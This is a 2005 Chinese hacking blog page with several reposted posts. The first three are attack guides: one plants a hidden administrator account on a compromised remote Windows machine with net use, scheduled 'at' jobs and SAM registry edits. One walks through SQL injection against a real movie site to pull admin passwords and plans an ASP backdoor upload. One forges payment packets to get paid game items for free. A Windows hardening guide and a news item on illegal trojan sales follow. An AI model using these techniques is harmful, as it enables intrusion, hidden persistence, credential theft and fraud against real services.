打开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。
6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可
8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用"net user"命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

如何在命令行下远程建立隐藏的超级用户
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)
2、先与肉鸡建立连接,命令为: net use 13.50.97.238ipc$ "12345678" /user:"administrator
3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at 13.50.97.238 12:51
c:winntsystem32net.exe user hacker$ 1234 /add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。
4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值:at 13.50.97.238 12:55
c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e 是regedit.exe的参数,在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将"c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers"引起来。
5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy 13.50.97.238admin$system32hacker.reg
c:hacker.reg
修改的方法图形界中已经介绍过了,这里就不作介绍了。
6、再将编辑好的hacker.reg拷回肉鸡上 copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg
7、查看肉鸡时间:net time 13.50.97.238 然后用at命令将用户hacker$删除:
at 13.50.97.238 13:40 net user hacker$ /del
8、验证hacker$是否删除:用
net use 13.50.97.238 /del 断开与肉鸡的连接。
net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。
9、再与肉鸡建立连接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"
再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:
at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg
regedit.exe的参数/s是指安静模式。
10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。
12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。
三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?
这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。
但是这里有两个前提:1、先用net use 肉鸡ipipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。
2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。
四、利用被禁用的帐户建立隐藏的超级用户:
我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:
1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。
2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。
3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:
net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。
4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user 肉鸡ipipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。
5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at 肉鸡ip 时间 net user hacker /active:no
6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。
五、注意的几点事项:
1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。
2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。
3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的"系统状态"主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。
4、本方法在2000/XP上测试通过,未在NT上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责。

杂志录入:hackbase    责任编辑:hackbase 

lingsui521 发表于:2005.04.26 21:12 ::分类: ( 实用技术 ) ::阅读:(1509次) :: 评论 (1)
===========================================================
SQL注入的新技巧!
===========================================================
表名和字段名的获得
适用情况:
1)
数据库是MSSQL
2)连接
数据库的只是普通用户
3)不知道ASP源
代码

可以进行的攻击
1)对数据内容进行添加,查看,更改

实例:
本文件以

为列进行测试
攻击

第一步:
在输入用户名处输入单引号,显示
Microsoft OLE DB Provider for SQL Server 错误 80040e14
字符串 之前有未闭合的引号。

/user/wantpws.asp,行63

说明没有过滤单引号且
数据库是MSSQL.

第二步:
输入a;use master;--
显示
Microsoft OLE DB Provider for SQL Server 错误 80040e21 多步LE DB 操作产生错误。如果可能,请检查每个 OLE DB 状态值。没有工作被完成。

/user/wantpws.asp,行63
这样说明没有权限了。

第三步:
输入:a or name like fff%;--
显示有一个叫ffff的用户哈。

第四步:
在用户名处输入
ffff and 1<>(select count(email) from [user]);--
显示:
Microsoft OLE DB Provider for SQL Server 错误 80040e37
对象名 user 无效。

/user/wantpws.asp,行96

说明没有叫user的表,换成users试试成功,同时说明有一个叫email的列.
输入a having 1=1--
一般返回如下也就可以直接得到表名和一个字段名了
Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.ID 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。

/user/wantpws.asp,行63

现在我们知道了ffff用户的
密码是111111.

下面通过语句得到
数据库中的所有表名和字段名。

第五步:
输入:
ffff;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
说明:
上面的语句是得到
数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad然后根据表名ad得到这个表的IDffff;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
同上可知id是:581577110由于对象标志id是根据由小到大排列的所以我们可以得到所有的用户表的名字了象下面这样就可以得到第二个表的名字了ffff;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--

ad 581577110
users 597577167
buy 613577224
car 629577281
learning 645577338
log 661577395
movie 677577452
movieurl 693577509
password 709577566
type 725577623
talk

经过一段时间的猜测后我们得到上面的分析一下应该明白password,users是最得要的

第六步:猜重要表的字段
输入:
现在就看看users表有哪些字段
ffff;update [users] set email=(select top 1 col
_name(object_id(users),3) from users) where name=ffff;--
得到第三个字段是password
ffff;update [users] set email=(select top 1 col
_name(object_id(users),4) from users) where name=ffff;--
得到第四个字段是name
最后users表的字段共28个全得到了
(注:另一个得到字段的办法,前提是系统的返回出错信息
a group by ID having 1=1--
得到
Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.userid 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
这个第二个字段就是userid
显示第三个字段。
a group by id,userid having 1=1--

Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.password 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
得到是password
同理,一直显示出所有。:)
)

users表
1 2 3 4
id userid password name

5 6 7 8 9 10 11 12 13 14 15 16
Province homeaddress city adress starlook sex email nlook nos date money send

17 18 19 20 21 22 23 24 25 26 27 28
oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note

starlook--12 10 2003 2:41PM
nlook---0
nos---2 登陆次数
date--12 10 2003 12:00AM 注册时间?
money--同上
send--空
oklook--0
dnlook--0
getmoney--0
state--0
note--这家伙很。。。 说明

password表
1 2 3
id name pwd

然后我又试ad原来是用来记录广告击点的。。
然后又试password表得到有name和pwd字段。
执行
ffff;update [users] set email=(select top 1 name from password) where name=ffff;--
可得第一个用户名是admin123看样儿多半是管理员了。
然后又得到了
密码是dy***dick188还是打星号算了哈哈...

这样我们就完全进入了这个电影网站的后台了哈哈。
_blank>http://www.dy***.com/login.asp

再进一步还可以知道管理员一共有三人
密码也都能看到了。
ffff;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
ffff;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--

ffff;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--

只是能免费看电影好象还不够哈..我看了看它的后台管理原来在添加电影的地方对于上传的图片没有过滤.asa的文件,这样我就能上传一个asp后门并执行

lingsui521 发表于:2005.04.24 17:40 ::分类: ( 最新信息 ) ::阅读:(2138次) :: 评论 (1)
===========================================================
免费刷劲乐团的装备和点券
===========================================================
_content>免费刷劲乐团的装备和点券

首先进游戏随便购买一件东西.进入交费页面.   取得SESSION认证



切换回桌面.用浏览器访问



_step01.asp?gameid=" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step01.asp?gameid=用户ID



然后再用溯雪载入此页.按购买.然后CTRL+I分析表格.得到物品代码.物品代码属性名为



SUMPID.



启动WPE进行嗅探.马上切换回游戏购买物品.



购买完成回WPE查包.



内容.



POST /payment/payment_step03.asp HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*..Referer:
_step02.asp..Accept-Language:" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step02.asp..Accept-Language: zh-cn..Content-Type: application/x-www-form-urlencoded..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)..Host: tradegzbp.9you.com:15000..Content-Length: 98..Connection: Keep-Alive..Cache-Control: no-cache..Cookie: bbscookie=8890517; 9youcookie=%2512%25E8%25AC%25EA0%25D0C; avatarcookie=6f377d52e99d4c1cc40788afea85f97c; newscookie=%25A5PcA%25ED%2502%2595%259B%25A4%25A5; mmcookie=%253C; ASPSESSIONIDCCRCCRQB=OOOJKAAACABKLDDNJIDCEADC....gameid=jamggg&SumPid=4747&SumgName=%B9%C2%B5%A5%CB%CC%D6%F7%CC%E2%CC%D7%D7%B0&chkCashType=GC&UserPwd=119&x=85&y=25.



从COOKIE=后数值不和上面相同.请注意.依自己抓的包而定.



修改后面这部分



gameid=jamggg&SumPid=4747&SumgName=%B9%C2%B5%A5%CB%CC%D6%F7%CC%E2%CC%D7%D7%B0&chkCashType=GC&UserPwd=119&x=85&y=25.



依次为游戏ID.物品代码.物品名.卡类.密码.请自己更改.



把SumPid=改成想买的未出售物品ID.SumgName改成想购买的物品名字(为汉字urlencode编码后的值)



后面还有一个包.需要使用.为发送状态.包的内容我没有保存.请自己去抓.内容为payment_step02.asp   验证通过.将此包保留下来.和上面的包各名为 包1 包2



.进入游戏.再次随便购买物品.进入到购买界面.开启一新网页浏览器.访问



_step01.asp?gameid=" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step01.asp?gameid=游戏帐号



有错误提示不要按确定.



然后到WPE内发送包1.发送包2.



然后直接访问



_step04.asp?gameid=" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step04.asp?gameid=游戏帐号



提示成功购买.下线重上.PASS了.



关于物品ID及名字.



请找一位在韩服玩的朋友.问一下物品名字.及按上面方法取得的物品ID.



----------------



其他.需要M币的装备.



.去弄个密码和你主帐号一样的用户名.里面要有M币.



先购买次普通物品取得COOKIES.



然后按COOKIES位置(封包内写了)把有M币的ID除了用户名外的COOKIES数据全部替换到现在使用的ID的COOKIES上.(浏览器打开的情况下).然后按上面的方法做就可以了.


lingsui521 发表于:2005.04.24 17:37 ::分类: ( 最新信息 ) ::阅读:(58894次) :: 评论 (1)
===========================================================
庆祝一下!!
===========================================================
今天BLOG逆向链接突破1000个,呵呵 ,心里特别高兴,感谢大家对我的支持,我会继续努力的,呵呵~~谢谢大家~~~~
lingsui521 发表于:2005.04.24 02:27 ::分类: ( 最新信息 ) ::阅读:(1123次) :: 评论 (1)
===========================================================
打造个人电脑安全终极防线.
===========================================================
【一、禁止默认共享 】 1.先察看本地共享资源 运行-cmd-输入net share 2.删除共享(每次输入一个) net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除) 3.删除ipc$空连接 在运行内输入regedit 在注册表中找到HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 项里数值名称RestrictAnonymous的数值数据由0改为1. 4.关闭自己的139端口,ipc和RPC漏洞存在于此. 关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)” 属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关 闭了139端口,禁止RPC漏洞. 【二、设置服务项,做好内部防御】 A计划.服务策略: 控制面板→管理工具→服务 关闭以下服务:  1.Alerter[通知选定的用户和计算机管理警报]  2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]  3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享  4.Distributed Link Tracking Server[适用局域网分布式链接跟踪客户端服务]  5.Human Interface Device Access[启用对人体学接口设备(HID)的通用输入访问]  6.IMAPI CD-Burning COM Service[管理 CD 录制]  7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]  8.Kerberos Key Distribution Center[授权协议登录网络]  9.License Logging[监视IIS和SQL如果你没安装IIS和SQL的话就停止] 10.Messenger[警报] 11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集] 12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换] 13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享] 14.Print Spooler[打印机服务,没有打印机就禁止吧] 15.Remote Desktop Help Session Manager[管理并控制远程协助] 16.Remote Registry[使远程计算机用户修改本地注册表] 17.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息] 18.Server[支持此计算机通过网络的文件、打印、和命名管道共享] 19.Special Administration Console Helper[允许管理员使用紧急管理服务远程访问命令行提示符] 20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持 而使用户能够共享文件、打印和登录到网络] 21.Telnet[允许远程用户登录到此计算机并运行程序] 22.Terminal Services[允许用户以交互方式连接到远程计算机] 23.Windows Image Acquisition (WIA)[照相服务,应用与数码摄象机] B计划.帐号策略: 一.打开管理工具.本地安全设置.密码策略 1.密码必须符合复杂要求性.启用 2.密码最小值.我设置的是10 3.密码最长使用期限.我是默认设置42天 4.密码最短使用期限0天 5.强制密码历史 记住0个密码 6.用可还原的加密来存储密码 禁用 C计划.本地策略: 打开管理工具 找到本地安全设置.本地策略.审核策略 1.审核策略更改 成功失败 2.审核登陆事件 成功失败 3.审核对象访问 失败 4.审核跟踪过程 无审核 5.审核目录服务访问 失败 6.审核特权使用 失败 7.审核系统事件 成功失败 8.审核帐户登陆时间 成功失败 9.审核帐户管理 成功失败  然后再到管理工具找到  事件查看器 应用程序 右键 属性 设置日志大小上限 我设置了512000KB选择不覆盖事件 安全性 右键 属性 设置日志大小上限 我也是设置了512000KB 选择不覆盖事件 系统 右键 属性 设置日志大小上限 我都是设置了512000KB选择不覆盖事件 D计划.安全策略: 打开管理工具 找到本地安全设置.本地策略.安全选项 1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,启用比较好,但是我个人是不需要直接输入密码登陆的] 2.网络访问.不允许SAM帐户的匿名枚举启用 3.网络访问.可匿名的共享 将后面的值删除 4.网络访问.可匿名的命名管道 将后面的值删除 5.网络访问.可远程访问的注册表路径 将后面的值删除 6.网络访问.可远程访问的注册表的子路径 将后面的值删除 7.网络访问.限制匿名访问命名管道和共享 8.帐户.重命名来宾帐户guest [最好写一个自己能记住中文名]让黑客去猜解guest吧,而且还得删除这个帐户,后面有详细解释] 9.帐户.重命名系统管理员帐户[建议取中文名] E计划.用户权限分配策略: 打开管理工具 找到本地安全设置.本地策略.用户权限分配 1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID 2.从远程系统强制关机,Admin帐户也删除,一个都不留 3.拒绝从网络访问这台计算机 将ID删除 4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务 5.通过终端允许登陆 删除Remote Desktop Users F计划.终端服务配置 打开管理工具  终端服务配置 1.打开后,点连接,右键,属性,远程控制,点不允许远程控制 2.常规,加密级别,高,在使用标准windows验证上点√! 3.网卡,将最多连接数上设置为0 4.高级,将里面的权限也删除.[我没设置]  再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话 G计划.用户和组策略 打开管理工具  计算机管理.本地用户和组.用户  删除Support_388945a0用户等等  只留下你更改好名字的adminisrator权限  计算机管理.本地用户和组.组  组.我们就不组了.分经验的(不管他.默认设置) X计划.DIY策略[根据个人需要] 1.当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透. 2.登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧. 3.对匿名连接的额外限制 4.禁止按 alt+crtl+del 5.允许在未登陆前关机[防止远程关机/启动、强制关机/启动] 6.只有本地登陆用户才能访问cd-rom 7.只有本地登陆用户才能访问软驱 8.取消关机原因的提示 1、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面; 2、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框; 3、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机; 4、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。 9.禁止关机事件跟踪 开始“Start ->”运行“ Run ->输入”gpedit.msc “,在出现的窗口的左边部分, 选择 ”计算机配置“(Computer Configuration )-> ”管理模板“  (Administrative Templates)-> ”系统“(System),在右边窗口双击 “Shutdown Event Tracker”在出现的对话框中选择“禁止”(Disabled), 点击然后“确定”(OK)保存后退出这样,你将看到类似于windows 2000的关机窗口 【三、修改权限防止病毒或木马等破坏系统】 winxp、windows2003以上版本适合本方法. 因为目前的木马抑或是病毒都喜欢驻留在system32目录下,如果我们用命令限制system32的写入和修改权限的话 那么,它们就没有办法写在里面了.看命令 A命令  cacls C:windowssystem32 /G administrator:R 禁止修改、写入C:windowssystem32目录  cacls C:windowssystem32 /G administrator:F 恢复修改、写入C:windowssystem32目录  呵呵,这样病毒等就进不去了,如果你觉得这个还不够安全,  还可以进行修改觉得其他危险目录,比如直接修改C盘的权限,但修改c修改、写入后,安装软件时需先把权限恢复过来才行 B命令  cacls C: /G administrator:R 禁止修改、写入C盘  cacls C: /G administrator:F 恢复修改、写入C盘  这个方法防止病毒,  如果您觉得一些病毒防火墙消耗内存太大的话  此方法稍可解决一点希望大家喜欢这个方法^_^ X命令 以下命令推荐给高级管理员使用[因为win版本不同,请自行修改参数] cacls %SystemRoot%system32cmd.exe /E /D IUSR_ComSpec禁止网络用户、本地用户在命令行和gui下使用cmd cacls %SystemRoot%system32cmd.exe /E /D IUSR_Lsa恢复网络用户、本地用户在命令行和gui下使用cmd cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa禁止网络用户、本地用户在命令行和gui下使用tftp.exe cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa恢复网络用户、本地用户在命令行和gui下使用tftp.exe cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa禁止网络用户、本地用户在命令行和gui下使用tftp32.exe cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa恢复网络用户、本地用户在命令行和gui下使用tftp32.exe 【四、重要文件名加密[NTFS格式]】 此命令的用途可加密windows的密码档,QQ密码档等等^.^ 命令行方式  加密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /e 文件名(或文件夹名)”。  解密:在DOS窗口或“开始” | “运行”的命令行中输入“cipher /d 文件名(或文件夹名)”。 【五、修改注册表防御D.D.O.S】 在注册表HKLMSYSTEMCurrentControlSetServicesTcpipParameters中更改以下值可以帮助你防御一定强度的DoS攻击 SynAttackProtect REG_DWORD 2 EnablePMTUDiscovery REG_DWORD 0 NoNameReleaseOnDemand REG_DWORD 1 EnableDeadGWDetect REG_DWORD 0 KeepAliveTime REG_DWORD 300,000 PerformRouterDiscovery REG_DWORD 0 EnableICMPRedirects REG_DWORD 0 更多新的防御技巧请搜索其他信息, 由于本人不敢拿自己的硬盘开玩笑,所以没做实验... ... 【六、打造更安全的防火墙】  只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放,  黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。 本人现将自己所知道的  端口公布如下(如果觉得还有危险需要过滤的,请联系本人:OICQ 250875628  端口 协议 应用程序 21 TCP FTP 25 TCP SMTP 53 TCP DNS 80 TCP HTTP SERVER 1433 TCP SQL SERVER 5631 TCP PCANYWHERE 5632 UDP PCANYWHERE 6(非端口) IP协议 8(非端口) IP协议  那么,我们根据自己的经验,将下面的端口关闭 TCP 21 22 23 25 TCP SMTP 53 TCP DNS 80 135 epmap 138 [冲击波] 139 smb 445 1025DCE/1ff70682-0a51-30e8-076d-740be8cee98b 1026DCE/12345778-1234-abcd-ef00-0123456789ac 1433 TCP SQL SERVER 5631 TCP PCANYWHERE 5632 UDP PCANYWHERE 3389 4444[冲击波] 4489 UDP 67[冲击波] 137 netbios-ns 161 An SNMP Agent is running/ Default community names of the SNMP Agent 关于UDP一般只有腾讯OICQ会打开4000或者是8000端口,那么,我们只运行本机使用4000端口就行了 【七、保护个人隐私】 1、TT浏览器 选择用另外一款浏览器浏览网站.我推荐用TT,使用TT是有道理的. TT可以识别网页中的脚本,JAVA程序,可以很好的抵御一些恶意的脚本等等,而且TT即使被感染, 你删除掉又重新安装一个就是.[TT就是腾讯的浏览器](不过有些人喜欢用MyIE,因为我使用的时间和 对他的了解不是很深吧,感觉不出他对安全方面有什么优势一_一~,希望支持MyIE的朋友不要揍我,否 则我会哭... ...) 2、移动“我的文档” 进入资源管理器,右击“我的文档”,选择“属性”,在“目标文件夹”选项卡中点“移动”按钮, 选择目标盘后按“确定”即可。在Windows 2003中“我的文档”已难觅芳踪,桌面、开始等处都看不到了, 建议经常使用的朋友做个快捷方式放到桌面上。 3、移动IE临时文件 进入“开始→控制面板→Internet 选项”,在“常规”选项卡的“Internet 文件”栏里点“设置”按钮, 在弹出窗体中点“移动文件夹”按钮,选择目标文件夹后,点“确定”,在弹出对话框中选择“是”, 系统会自动重新登录。点本地连接,高级,安全日志,把日志的目录更改专门分配日志的目录, 不建议是C:再重新分配日志存储值的大小,我是设置了10000KB  【八、第三方软件的帮助】 防火墙:天网防火墙(建议)[二道贩子注:winxp以上可以考虑用系统自带的防火墙,win2000可以考虑用IPSEC,是个锻炼的机会) 杀毒软件:卡巴斯基 二道贩子后注: 现在黑客的攻击有从传统的系统漏洞转向了你的浏览器,所以要在升级一些传统漏洞补丁的同时要注意你的浏览器.
lingsui521 发表于:2005.04.23 15:14 ::分类: ( 最新信息 ) ::阅读:(926次) :: 评论 (2)
===========================================================
网络上公开叫卖电脑病毒此举属违法
===========================================================
有不少网站正公开销售木马病毒生成器,而利用木马病毒,不法分子可以轻易地盗取QQ和网络游戏用户的账号和密码。福州市公安局网络安全处有关人士表示,公开销售病毒的行为是违法的。   日前,榕城不少QQ和网络游戏的用户都遭遇了账号和密码被盗的事件。据福州市公安局网络安全处有关人士介绍,最近,他们接到不少关于他人利用盗窃来的QQ账号向用户的亲戚朋友骗钱的报案。他们调查后发现,大多数密码被盗的用户电脑里都存在木马病毒,正是其向病毒发送者传送了用户密码等信息。而这些病毒的来源更是令人吃惊,因为有不少网站竟然公开销售木马病毒生成器。   记者昨日在百度的搜索引擎中输入“病毒生成器”字样,发现相关条目高达54680项,其中大部分为售卖或下载病毒(木马)生成器的信息,如VBS脚本病毒生成器V1.0版、QQ病毒生成器等。对此,网络安全专家表示,目前使用QQ、MSN等即时通讯软件的人非常多,而网络游戏市场也十分火爆,各种游戏虚拟装备、游戏账号和密码都可以在现实中转换为现金,于是很多不法分子开始利用木马病毒窃号,最终导致售卖病毒生成器市场的形成。   不过,福州市公安局网络安全处有关人士表示,很明显,在网络上公开叫卖木马生成器是违法的,但由于互联网的公开性和虚拟性,互联网管理规范无法有效实施。因此他们建议,电脑用户从网上下载文件后一定要用最新版杀毒软件检测后才运行,上网时也要打开个人防火墙,必要时,还可以将防火墙的安全级别提高到最高级,以防止木马病毒的攻击
lingsui521 发表于:2005.04.22 06:03 ::分类: ( 最新信息 ) ::阅读:(654次) :: 评论 (1)
自我介绍
切换风格
新闻聚合
博客日历
文章归档...
最新发表...
博客统计...
Blog信息
网站链接...